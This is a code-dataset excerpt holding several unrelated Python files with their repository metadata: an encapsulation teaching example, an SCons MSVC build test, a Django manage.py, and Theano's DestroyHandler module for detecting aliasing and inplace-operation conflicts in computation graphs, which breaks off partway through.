hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
84f1ba58276b441ec0efba4e71b268d5818704a9
| 1,036
|
py
|
Python
|
Notlar/ahmetbaran/OOP_2_Encapsulation.py
|
ibrahimediz/ornekproje
|
c5ebeafc43a9c6d2aa639d0d95eedbce65991576
|
[
"Apache-2.0"
] | null | null | null |
Notlar/ahmetbaran/OOP_2_Encapsulation.py
|
ibrahimediz/ornekproje
|
c5ebeafc43a9c6d2aa639d0d95eedbce65991576
|
[
"Apache-2.0"
] | null | null | null |
Notlar/ahmetbaran/OOP_2_Encapsulation.py
|
ibrahimediz/ornekproje
|
c5ebeafc43a9c6d2aa639d0d95eedbce65991576
|
[
"Apache-2.0"
] | null | null | null |
class A:
def __init__(self,yetki):
self.yetki = yetki
self.__gizli = 2
# __gizli gizli
# __gizli_ gizli
# __gizli__ gizli değil
obj1 = A(1)
print(obj1.yetki)
# print(obj1.__gizli) # AttributeError: 'A' object has no attribute '__gizli'
class A:
def __init__(self,yetki):
self.yetki = yetki
self.__gizli = 2
@property # asagidakiler fonksiyonun ismiyle ayni olmak zorunda
def gizli(self): # getter
if self.yetki == 1:
return self.__gizli
else:
raise Exception("Yetki Hatası")
@gizli.setter
def gizli(self,param):
if self.yetki == 1:
if isinstance(param,int) and param in range(10):
self.__gizli = param
else:
raise Exception("Değer Hatası")
else:
raise Exception("Yetki Hatası")
@gizli.deleter
def gizli(self):
if self.yetki == 1:
self.__gizli = -1*self.gizli
else:
raise Exception("Yetki Hatası")
| 26.564103
| 77
| 0.572394
|
49ebe786db926dc0ed7c1ea2d2ebc8822fe87825
| 2,572
|
py
|
Python
|
test/MSVC/hierarchical.py
|
jcassagnol-public/scons
|
8eaf585a893757e68c9e4a6e25d375021fa5eab7
|
[
"MIT"
] | 1,403
|
2017-11-23T14:24:01.000Z
|
2022-03-30T20:59:39.000Z
|
test/MSVC/hierarchical.py
|
jcassagnol-public/scons
|
8eaf585a893757e68c9e4a6e25d375021fa5eab7
|
[
"MIT"
] | 3,708
|
2017-11-27T13:47:12.000Z
|
2022-03-29T17:21:17.000Z
|
test/MSVC/hierarchical.py
|
jcassagnol-public/scons
|
8eaf585a893757e68c9e4a6e25d375021fa5eab7
|
[
"MIT"
] | 281
|
2017-12-01T23:48:38.000Z
|
2022-03-31T15:25:44.000Z
|
#!/usr/bin/env python
#
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Verify use of Visual Studio with a hierarchical build.
"""
import TestSCons
test = TestSCons.TestSCons(match = TestSCons.match_re)
test.skip_if_not_msvc()
test.subdir('src', 'build', 'out')
test.write('SConstruct', """
DefaultEnvironment(tools=[])
VariantDir('build', 'src', duplicate=0)
SConscript('build/SConscript')
""")
test.write('src/SConscript',"""
# TODO: this is order-dependent (putting 'mssdk' second or third breaks),
# and ideally we shouldn't need to specify the tools= list anyway.
env = Environment(tools=['mssdk', 'msvc', 'mslink'])
env['PCH'] = File('StdAfx.pch')
env['PDB'] = '#out/test.pdb'
env['PCHSTOP'] = 'StdAfx.h'
env.PCH('StdAfx.cpp')
env.Program('#out/test.exe', 'test.cpp')
""")
test.write('src/test.cpp', '''
#include "StdAfx.h"
int main(void)
{
return 1;
}
''')
test.write('src/StdAfx.h', '''
#include <windows.h>
''')
test.write('src/StdAfx.cpp', '''
#include "StdAfx.h"
''')
test.run(arguments='out', stderr=None)
test.must_exist(test.workpath('out/test.pdb'))
test.must_exist(test.workpath('build/StdAfx.pch'))
test.must_exist(test.workpath('build/StdAfx.obj'))
test.run(arguments='-c out')
test.must_not_exist(test.workpath('out/test.pdb'))
test.must_not_exist(test.workpath('build/StdAfx.pch'))
test.must_not_exist(test.workpath('build/StdAfx.obj'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 27.655914
| 74
| 0.729782
|
6a1223d96b629f7f36a99805a57127aa1d59f096
| 538
|
py
|
Python
|
web/manage.py
|
karlbishnu/NotZam
|
5b3ec35a383b56f38fe623cb228063d13c1d3d91
|
[
"MIT"
] | null | null | null |
web/manage.py
|
karlbishnu/NotZam
|
5b3ec35a383b56f38fe623cb228063d13c1d3d91
|
[
"MIT"
] | 1
|
2018-11-27T06:41:17.000Z
|
2018-11-27T06:41:17.000Z
|
web/manage.py
|
karlbishnu/NotZam
|
5b3ec35a383b56f38fe623cb228063d13c1d3d91
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'NotZam.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.625
| 73
| 0.685874
|
61efc2de0856dfcbefe21bc60eb9db2ddcccbdbe
| 43,056
|
py
|
Python
|
libs/Theano/theano/gof/destroyhandler.py
|
dendisuhubdy/attention-lvcsr
|
598d487c118e66875fdd625baa84ed29d283b800
|
[
"MIT"
] | 295
|
2015-09-25T21:15:04.000Z
|
2022-01-13T01:16:18.000Z
|
libs/Theano/theano/gof/destroyhandler.py
|
shenshenzhanzhan/attention-lvcsr
|
598d487c118e66875fdd625baa84ed29d283b800
|
[
"MIT"
] | 21
|
2015-10-28T19:06:32.000Z
|
2022-03-11T23:13:05.000Z
|
libs/Theano/theano/gof/destroyhandler.py
|
shenshenzhanzhan/attention-lvcsr
|
598d487c118e66875fdd625baa84ed29d283b800
|
[
"MIT"
] | 114
|
2015-09-26T21:23:02.000Z
|
2021-11-19T02:36:41.000Z
|
"""
Classes and functions for validating graphs that contain view
and inplace operations.
"""
from collections import deque
from six import iteritems
import theano
from . import toolbox
from . import graph
from theano.compat import OrderedDict
from theano.misc.ordered_set import OrderedSet
from .fg import InconsistencyError
from six.moves.queue import Queue
class ProtocolError(Exception):
"""
Raised when FunctionGraph calls DestroyHandler callbacks in
an invalid way, for example, pruning or changing a node that has
never been imported.
"""
pass
def _contains_cycle(fgraph, orderings):
"""
Parameters
----------
fgraph
The FunctionGraph to check for cycles.
orderings
Dictionary specifying extra dependencies besides those encoded in
Variable.owner / Apply.inputs.
If orderings[my_apply] == dependencies, then my_apply is an Apply
instance, dependencies is a set of Apply instances, and every member
of dependencies must be executed before my_apply.
The dependencies are typically used to prevent
inplace apply nodes from destroying their input before
other apply nodes with the same input access it.
Returns
-------
bool
True if the graph contains a cycle, False otherwise.
"""
# These are lists of Variable instances
outputs = fgraph.outputs
# this is hard-coded reimplementation of functions from graph.py
# reason: go faster, prepare for port to C.
# specifically, it could be replaced with a wrapper
# around graph.io_toposort that returns True iff io_toposort raises
# a ValueError containing the substring 'cycle'.
# This implementation is optimized for the destroyhandler and runs
# slightly faster than io_toposort.
# this is performance-critical code. it is the largest single-function
# bottleneck when compiling large graphs.
assert isinstance(outputs, (tuple, list, deque))
# TODO: For more speed - use a defaultdict for the orderings
# (defaultdict runs faster than dict in the case where the key
# is not in the dictionary, at least in CPython)
# IG: I tried converting parent_counts to use an id for the key,
# so that the dict would do reference counting on its keys.
# This caused a slowdown.
# Separate benchmark tests showed that calling id is about
# half as expensive as a dictionary access, and that the
# dictionary also runs slower when storing ids than when
# storing objects.
# dict mapping an Apply or Variable instance to the number
# of its parents (including parents imposed by orderings)
# that haven't been visited yet
parent_counts = {}
# dict mapping an Apply or Variable instance to its children
node_to_children = {}
# visitable: A container holding all Variable and Apply instances
# that can currently be visited according to the graph topology
# (ie, whose parents have already been visited)
# TODO: visitable is a fifo_queue. could this run faster if we
# implement it as a stack rather than a deque?
# TODO: visitable need not be a fifo_queue, any kind of container
# that we can throw things into and take things out of quickly will
# work. is there another kind of container that could run faster?
# we don't care about the traversal order here as much as we do
# in io_toposort because we aren't trying to generate an ordering
# on the nodes
visitable = deque()
# IG: visitable could in principle be initialized to fgraph.inputs
# + fgraph.orphans... if there were an fgraph.orphans structure.
# I tried making one and maintaining it caused a huge slowdown.
# This may be because I made it a list, so it would have a
# deterministic iteration order, in hopes of using it to speed
# up toposort as well.
# I think since we need to scan through all variables and nodes
# to make parent_counts anyway, it's cheap enough to always
# detect orphans at cycle detection / toposort time
# Pass through all the nodes to build visitable, parent_count, and
# node_to_children
for var in fgraph.variables:
# this is faster than calling get_parents
owner = var.owner
# variables don't appear in orderings, so we don't need to worry
# about that here
if owner:
# insert node in node_to_children[r]
# (if r is not already in node_to_children,
# intialize it to [])
node_to_children.setdefault(owner, []).append(var)
parent_counts[var] = 1
else:
visitable.append(var)
parent_counts[var] = 0
for a_n in fgraph.apply_nodes:
parents = list(a_n.inputs)
# This is faster than conditionally extending
# IG: I tried using a shared empty_list = [] constructed
# outside of the for loop to avoid constructing multiple
# lists, but this was not any faster.
parents.extend(orderings.get(a_n, []))
if parents:
for parent in parents:
# insert node in node_to_children[r]
# (if r is not already in node_to_children,
# intialize it to [])
node_to_children.setdefault(parent, []).append(a_n)
parent_counts[a_n] = len(parents)
else:
# an Apply with no inputs would be a weird case, but I'm
# not sure we forbid it
visitable.append(a_n)
parent_counts[a_n] = 0
# at this point,
# parent_counts.keys() == fgraph.apply_nodes + fgraph.variables
# Now we actually check for cycles
# As long as there are nodes that can be visited while respecting
# the topology, we keep visiting nodes
# If we run out of visitable nodes and we haven't visited all nodes,
# then there was a cycle. It blocked the traversal because some
# node couldn't be visited until one of its descendants had been
# visited too.
# This is a standard cycle detection algorithm.
visited = 0
while visitable:
# Since each node is inserted into the visitable queue exactly
# once, it comes out of the queue exactly once
# That means we can decrement its children's unvisited parent count
# and increment the visited node count without double-counting
node = visitable.popleft()
visited += 1
for client in node_to_children.get(node, []):
parent_counts[client] -= 1
# If all of a node's parents have been visited,
# it may now be visited too
if not parent_counts[client]:
visitable.append(client)
return visited != len(parent_counts)
def _build_droot_impact(destroy_handler):
droot = {} # destroyed view + nonview variables -> foundation
impact = {} # destroyed nonview variable -> it + all views of it
root_destroyer = {} # root -> destroyer apply
for app in destroy_handler.destroyers:
for output_idx, input_idx_list in app.op.destroy_map.items():
if len(input_idx_list) != 1:
raise NotImplementedError()
input_idx = input_idx_list[0]
input = app.inputs[input_idx]
# Find non-view variable which is ultimatly viewed by input.
view_i = destroy_handler.view_i
_r = input
while _r is not None:
r = _r
_r = view_i.get(r)
input_root = r
if input_root in droot:
raise InconsistencyError(
"Multiple destroyers of %s" % input_root)
droot[input_root] = input_root
root_destroyer[input_root] = app
# The code here add all the variables that are views of r into
# an OrderedSet input_impact
input_impact = OrderedSet()
queue = Queue()
queue.put(input_root)
while not queue.empty():
v = queue.get()
for n in destroy_handler.view_o.get(v, []):
input_impact.add(n)
queue.put(n)
for v in input_impact:
assert v not in droot
droot[v] = input_root
impact[input_root] = input_impact
impact[input_root].add(input_root)
return droot, impact, root_destroyer
def fast_inplace_check(inputs):
"""
Return the variables in inputs that are posible candidate for as inputs of
inplace operation.
Parameters
----------
inputs : list
Inputs Variable that you want to use as inplace destination.
"""
fgraph = inputs[0].fgraph
Supervisor = theano.compile.function_module.Supervisor
protected_inputs = [f.protected for f in fgraph._features
if isinstance(f, Supervisor)]
protected_inputs = sum(protected_inputs, []) # flatten the list
protected_inputs.extend(fgraph.outputs)
inputs = [i for i in inputs if
not isinstance(i, graph.Constant) and
not fgraph.destroyers(i) and
i not in protected_inputs]
return inputs
if 0:
# old, non-incremental version of the DestroyHandler
class DestroyHandler(toolbox.Bookkeeper):
"""
The DestroyHandler class detects when a graph is impossible to evaluate
because of aliasing and destructive operations.
Several data structures are used to do this.
When an Op uses its view_map property to declare that an output may be
aliased to an input, then if that output is destroyed, the input is also
considering to be destroyed. The view_maps of several Ops can feed into
one another and form a directed graph. The consequence of destroying any
variable in such a graph is that all variables in the graph must be
considered to be destroyed, because they could all be refering to the
same underlying storage. In the current implementation, that graph is a
tree, and the root of that tree is called the foundation. The `droot`
property of this class maps from every graph variable to its foundation.
The `impact` property maps backward from the foundation to all of the
variables that depend on it. When any variable is destroyed, this class
marks the foundation of that variable as being destroyed, with the
`root_destroyer` property.
"""
droot = {}
"""
destroyed view + nonview variables -> foundation.
"""
impact = {}
"""
destroyed nonview variable -> it + all views of it.
"""
root_destroyer = {}
"""
root -> destroyer apply.
"""
def __init__(self, do_imports_on_attach=True):
self.fgraph = None
self.do_imports_on_attach = do_imports_on_attach
def on_attach(self, fgraph):
"""
When attaching to a new fgraph, check that
1) This DestroyHandler wasn't already attached to some fgraph
(its data structures are only set up to serve one)
2) The FunctionGraph doesn't already have a DestroyHandler.
This would result in it validating everything twice, causing
compilation to be slower.
TODO: WRITEME: what does this do besides the checks?
"""
# Do the checking #
already_there = False
if self.fgraph not in [None, fgraph]:
raise Exception("A DestroyHandler instance can only serve"
" one FunctionGraph. (Matthew 6:24)")
for attr in ('destroyers', 'destroy_handler'):
if hasattr(fgraph, attr):
already_there = True
if already_there:
# FunctionGraph.attach_feature catches AlreadyThere
# and cancels the attachment
raise toolbox.AlreadyThere(
"DestroyHandler feature is already present or in"
" conflict with another plugin.")
# end of checking #
def get_destroyers_of(r):
droot, impact, root_destroyer = self.refresh_droot_impact()
try:
return [root_destroyer[droot[r]]]
except Exception:
return []
fgraph.destroyers = get_destroyers_of
fgraph.destroy_handler = self
self.fgraph = fgraph
self.destroyers = OrderedSet() # set of Apply instances with non-null destroy_map
self.view_i = {} # variable -> variable used in calculation
self.view_o = {} # variable -> set of variables that use this one as a direct input
# clients: how many times does an apply use a given variable
self.clients = {} # variable -> apply -> ninputs
self.stale_droot = True
# IG: It's unclear if this is meant to be included in deployed code. It looks like
# it is unnecessary if FunctionGraph is working correctly, so I am commenting uses
# of it (for speed) but leaving the commented code in place so it is easy to restore
# for debugging purposes.
# Note: is there anything like the C preprocessor for python? It would be useful to
# just ifdef these things out
# self.debug_all_apps = set()
if self.do_imports_on_attach:
toolbox.Bookkeeper.on_attach(self, fgraph)
def refresh_droot_impact(self):
if self.stale_droot:
self.droot, self.impact, self.root_destroyer = _build_droot_impact(self)
self.stale_droot = False
return self.droot, self.impact, self.root_destroyer
def on_detach(self, fgraph):
if fgraph is not self.fgraph:
raise Exception("detaching wrong fgraph", fgraph)
del self.destroyers
del self.view_i
del self.view_o
del self.clients
del self.stale_droot
assert self.fgraph.destroyer_handler is self
delattr(self.fgraph, 'destroyers')
delattr(self.fgraph, 'destroy_handler')
self.fgraph = None
def on_import(self, fgraph, app, reason):
"""
Add Apply instance to set which must be computed.
"""
# if app in self.debug_all_apps: raise ProtocolError("double import")
# self.debug_all_apps.add(app)
# print 'DH IMPORT', app, id(app), id(self), len(self.debug_all_apps)
# If it's a destructive op, add it to our watch list
if getattr(app.op, 'destroy_map', {}):
self.destroyers.add(app)
# add this symbol to the forward and backward maps
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map', {})):
if len(i_idx_list) > 1:
raise NotImplementedError(
'destroying this output invalidates multiple inputs',
(app. op))
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
self.view_i[o] = i
self.view_o.setdefault(i, OrderedSet()).add(o)
# update self.clients
for i, input in enumerate(app.inputs):
self.clients.setdefault(input, {}).setdefault(app, 0)
self.clients[input][app] += 1
for i, output in enumerate(app.outputs):
self.clients.setdefault(output, {})
self.stale_droot = True
def on_prune(self, fgraph, app, reason):
"""
Remove Apply instance from set which must be computed.
"""
# if app not in self.debug_all_apps: raise ProtocolError("prune without import")
# self.debug_all_apps.remove(app)
# UPDATE self.clients
for i, input in enumerate(OrderedSet(app.inputs)):
del self.clients[input][app]
if getattr(app.op, 'destroy_map', {}):
self.destroyers.remove(app)
# Note: leaving empty client dictionaries in the struct.
# Why? It's a pain to remove them. I think they aren't doing any harm, they will be
# deleted on_detach().
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map', {})):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
del self.view_i[o]
self.view_o[i].remove(o)
if not self.view_o[i]:
del self.view_o[i]
self.stale_droot = True
def on_change_input(self, fgraph, app, i, old_r, new_r, reason):
"""
app.inputs[i] changed from old_r to new_r.
"""
if app == 'output':
# app == 'output' is special key that means FunctionGraph is redefining which nodes are being
# considered 'outputs' of the graph.
pass
else:
# if app not in self.debug_all_apps: raise ProtocolError("change without import")
# UPDATE self.clients
self.clients[old_r][app] -= 1
if self.clients[old_r][app] == 0:
del self.clients[old_r][app]
self.clients.setdefault(new_r, {}).setdefault(app, 0)
self.clients[new_r][app] += 1
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map',
{})):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
i_idx = i_idx_list[0]
output = app.outputs[o_idx]
if i_idx == i:
if app.inputs[i_idx] is not new_r:
raise ProtocolError("wrong new_r on change")
self.view_i[output] = new_r
self.view_o[old_r].remove(output)
if not self.view_o[old_r]:
del self.view_o[old_r]
self.view_o.setdefault(new_r, OrderedSet()).add(output)
self.stale_droot = True
def validate(self, fgraph):
"""
Return None.
Raise InconsistencyError when
a) orderings() raises an error
b) orderings cannot be topologically sorted.
"""
if self.destroyers:
ords = self.orderings(fgraph)
if _contains_cycle(fgraph, ords):
raise InconsistencyError(
"Dependency graph contains cycles")
else:
# James's Conjecture:
# If there are no destructive ops, then there can be no cycles.
pass
return True
def orderings(self, fgraph):
"""
Return orderings induced by destructive operations.
Raise InconsistencyError when
a) attempting to destroy indestructable variable, or
b) attempting to destroy a value multiple times, or
c) an Apply destroys (illegally) one of its own inputs by aliasing
"""
rval = OrderedDict()
if self.destroyers:
# BUILD DATA STRUCTURES
# CHECK for multiple destructions during construction of variables
droot, impact, __ignore = self.refresh_droot_impact()
# check for destruction of constants
illegal_destroy = [
r for r in droot if
getattr(r.tag, 'indestructible', False) or
isinstance(r, graph.Constant)]
if illegal_destroy:
# print 'destroying illegally'
raise InconsistencyError(
"Attempting to destroy indestructible variables: %s" %
illegal_destroy)
# add destroyed variable clients as computational dependencies
for app in self.destroyers:
# for each destroyed input...
for output_idx, input_idx_list in iteritems(app.op.destroy_map):
destroyed_idx = input_idx_list[0]
destroyed_variable = app.inputs[destroyed_idx]
root = droot[destroyed_variable]
root_impact = impact[root]
# we generally want to put all clients of things which depend on root
# as pre-requisites of app.
# But, app is itself one such client!
# App will always be a client of the node we're destroying
# (destroyed_variable, but the tricky thing is when it is also a client of
# *another variable* viewing on the root. Generally this is illegal, (e.g.,
# add_inplace(x, x.T). In some special cases though, the in-place op will
# actually be able to work properly with multiple destroyed inputs (e.g,
# add_inplace(x, x). An Op that can still work in this case should declare
# so via the 'destroyhandler_tolerate_same' attribute or
# 'destroyhandler_tolerate_aliased' attribute.
#
# destroyhandler_tolerate_same should be a list of pairs of the form
# [(idx0, idx1), (idx0, idx2), ...]
# The first element of each pair is the input index of a destroyed
# variable.
# The second element of each pair is the index of a different input where
# we will permit exactly the same variable to appear.
# For example, add_inplace.tolerate_same might be [(0,1)] if the destroyed
# input is also allowed to appear as the second argument.
#
# destroyhandler_tolerate_aliased is the same sort of list of
# pairs.
# op.destroyhandler_tolerate_aliased = [(idx0, idx1)] tells the
# destroyhandler to IGNORE an aliasing between a destroyed
# input idx0 and another input idx1.
# This is generally a bad idea, but it is safe in some
# cases, such as
# - the op reads from the aliased idx1 before modifying idx0
# - the idx0 and idx1 are guaranteed not to overlap (e.g.
# they are pointed at different rows of a matrix).
#
# CHECK FOR INPUT ALIASING
# OPT: pre-compute this on import
tolerate_same = getattr(app.op,
'destroyhandler_tolerate_same',
[])
assert isinstance(tolerate_same, list)
tolerated = OrderedSet(idx1 for idx0, idx1 in
tolerate_same
if idx0 == destroyed_idx)
tolerated.add(destroyed_idx)
tolerate_aliased = getattr(
app.op, 'destroyhandler_tolerate_aliased', [])
assert isinstance(tolerate_aliased, list)
ignored = OrderedSet(idx1 for idx0, idx1
in tolerate_aliased
if idx0 == destroyed_idx)
# print 'tolerated', tolerated
# print 'ignored', ignored
for i, input in enumerate(app.inputs):
if i in ignored:
continue
if input in root_impact \
and (i not in tolerated or input is not destroyed_variable):
raise InconsistencyError("Input aliasing: %s (%i, %i)"
% (app, destroyed_idx, i))
# add the rule: app must be preceded by all other Apply instances that
# depend on destroyed_input
root_clients = OrderedSet()
for r in root_impact:
assert not [a for a, c in
iteritems(self.clients[r]) if not c]
root_clients.update([a for a, c in
iteritems(self.clients[r])
if c])
root_clients.remove(app)
if root_clients:
rval[app] = root_clients
return rval
class DestroyHandler(toolbox.Bookkeeper): # noqa
"""
The DestroyHandler class detects when a graph is impossible to evaluate
because of aliasing and destructive operations.
Several data structures are used to do this.
An Op can use its view_map property to declare that an output may be
aliased to an input. If that output is destroyed, the input is also
considered to be destroyed. The view_maps of several Ops can feed into
one another and form a directed graph. The consequence of destroying any
variable in such a graph is that all variables in the graph must be
considered to be destroyed, because they could all be refering to the
same underlying storage.
In the current implementation, that graph is a tree, and the root of that
tree is called the foundation.
TODO: why "in the current implementation" ? is there another implementation
planned?
TODO: why is the graph a tree? isn't it possible that one variable could
be aliased to many variables? for example, don't switch and ifelse
have to do this?
The original DestroyHandler (if 0'ed out above) computed several data
structures from scratch each time it was asked to validate the graph.
Because this happens potentially thousands of times and each graph to
validate is extremely similar to the previous one, computing the
data structures from scratch repeatedly was wasteful and resulted in
high compile times for large graphs.
This implementation computes the data structures once at initialization
and then incrementally updates them.
It is a work in progress. The following data structures have been
converted to use the incremental strategy:
<none>
The following data structures remain to be converted:
<unknown>
"""
pickle_rm_attr = ["destroyers"]
def __init__(self, do_imports_on_attach=True):
self.fgraph = None
self.do_imports_on_attach = do_imports_on_attach
"""
Maps every variable in the graph to its "foundation" (deepest
ancestor in view chain).
TODO: change name to var_to_vroot.
"""
self.droot = OrderedDict()
"""
Maps a variable to all variables that are indirect or direct views of it
(including itself) essentially the inverse of droot.
TODO: do all variables appear in this dict, or only those that are
foundations?
TODO: do only destroyed variables go in here? one old docstring said so.
TODO: rename to x_to_views after reverse engineering what x is
"""
self.impact = OrderedDict()
"""
If a var is destroyed, then this dict will map
droot[var] to the apply node that destroyed var
TODO: rename to vroot_to_destroyer
"""
self.root_destroyer = OrderedDict()
def on_attach(self, fgraph):
"""
When attaching to a new fgraph, check that
1) This DestroyHandler wasn't already attached to some fgraph
(its data structures are only set up to serve one).
2) The FunctionGraph doesn't already have a DestroyHandler.
This would result in it validating everything twice, causing
compilation to be slower.
Give the FunctionGraph instance:
1) A new method "destroyers(var)"
TODO: what does this do exactly?
2) A new attribute, "destroy_handler"
TODO: WRITEME: what does this do besides the checks?
"""
# Do the checking #
already_there = False
if self.fgraph is fgraph:
already_there = True
if self.fgraph is not None:
raise Exception(
"A DestroyHandler instance can only serve one"
" FunctionGraph. (Matthew 6:24)")
for attr in ('destroyers', 'destroy_handler'):
if hasattr(fgraph, attr):
already_there = True
if already_there:
# FunctionGraph.attach_feature catches AlreadyThere and cancels the attachment
raise toolbox.AlreadyThere(
"DestroyHandler feature is already present"
" or in conflict with another plugin.")
# Annotate the FunctionGraph #
self.unpickle(fgraph)
fgraph.destroy_handler = self
self.fgraph = fgraph
self.destroyers = OrderedSet() # set of Apply instances with non-null destroy_map
self.view_i = OrderedDict() # variable -> variable used in calculation
self.view_o = OrderedDict() # variable -> set of variables that use this one as a direct input
# clients: how many times does an apply use a given variable
self.clients = OrderedDict() # variable -> apply -> ninputs
self.stale_droot = True
self.debug_all_apps = OrderedSet()
if self.do_imports_on_attach:
toolbox.Bookkeeper.on_attach(self, fgraph)
def unpickle(self, fgraph):
def get_destroyers_of(r):
droot, impact, root_destroyer = self.refresh_droot_impact()
try:
return [root_destroyer[droot[r]]]
except Exception:
return []
fgraph.destroyers = get_destroyers_of
def refresh_droot_impact(self):
"""
Makes sure self.droot, self.impact, and self.root_destroyer are up to
date, and returns them (see docstrings for these properties above).
"""
if self.stale_droot:
self.droot, self.impact, self.root_destroyer =\
_build_droot_impact(self)
self.stale_droot = False
return self.droot, self.impact, self.root_destroyer
def on_detach(self, fgraph):
if fgraph is not self.fgraph:
raise Exception("detaching wrong fgraph", fgraph)
del self.destroyers
del self.view_i
del self.view_o
del self.clients
del self.stale_droot
assert self.fgraph.destroyer_handler is self
delattr(self.fgraph, 'destroyers')
delattr(self.fgraph, 'destroy_handler')
self.fgraph = None
def on_import(self, fgraph, app, reason):
"""
Add Apply instance to set which must be computed.
"""
if app in self.debug_all_apps:
raise ProtocolError("double import")
self.debug_all_apps.add(app)
# print 'DH IMPORT', app, id(app), id(self), len(self.debug_all_apps)
# If it's a destructive op, add it to our watch list
if getattr(app.op, 'destroy_map', {}):
self.destroyers.add(app)
# add this symbol to the forward and backward maps
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map', {})):
if len(i_idx_list) > 1:
raise NotImplementedError(
'destroying this output invalidates multiple inputs',
(app. op))
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
self.view_i[o] = i
self.view_o.setdefault(i, OrderedSet()).add(o)
# update self.clients
for i, input in enumerate(app.inputs):
self.clients.setdefault(input, OrderedDict()).setdefault(app, 0)
self.clients[input][app] += 1
for i, output in enumerate(app.outputs):
self.clients.setdefault(output, OrderedDict())
self.stale_droot = True
def on_prune(self, fgraph, app, reason):
"""
Remove Apply instance from set which must be computed.
"""
if app not in self.debug_all_apps:
raise ProtocolError("prune without import")
self.debug_all_apps.remove(app)
# UPDATE self.clients
for i, input in enumerate(OrderedSet(app.inputs)):
del self.clients[input][app]
if getattr(app.op, 'destroy_map', OrderedDict()):
self.destroyers.remove(app)
# Note: leaving empty client dictionaries in the struct.
# Why? It's a pain to remove them. I think they aren't doing any harm, they will be
# deleted on_detach().
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map',
OrderedDict())):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
del self.view_i[o]
self.view_o[i].remove(o)
if not self.view_o[i]:
del self.view_o[i]
self.stale_droot = True
def on_change_input(self, fgraph, app, i, old_r, new_r, reason):
"""
app.inputs[i] changed from old_r to new_r.
"""
if app == 'output':
# app == 'output' is special key that means FunctionGraph is redefining which nodes are being
# considered 'outputs' of the graph.
pass
else:
if app not in self.debug_all_apps:
raise ProtocolError("change without import")
# UPDATE self.clients
self.clients[old_r][app] -= 1
if self.clients[old_r][app] == 0:
del self.clients[old_r][app]
self.clients.setdefault(new_r, OrderedDict()).setdefault(app, 0)
self.clients[new_r][app] += 1
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map',
OrderedDict())):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
i_idx = i_idx_list[0]
output = app.outputs[o_idx]
if i_idx == i:
if app.inputs[i_idx] is not new_r:
raise ProtocolError("wrong new_r on change")
self.view_i[output] = new_r
self.view_o[old_r].remove(output)
if not self.view_o[old_r]:
del self.view_o[old_r]
self.view_o.setdefault(new_r, OrderedSet()).add(output)
self.stale_droot = True
def validate(self, fgraph):
"""
Return None.
Raise InconsistencyError when
a) orderings() raises an error
b) orderings cannot be topologically sorted.
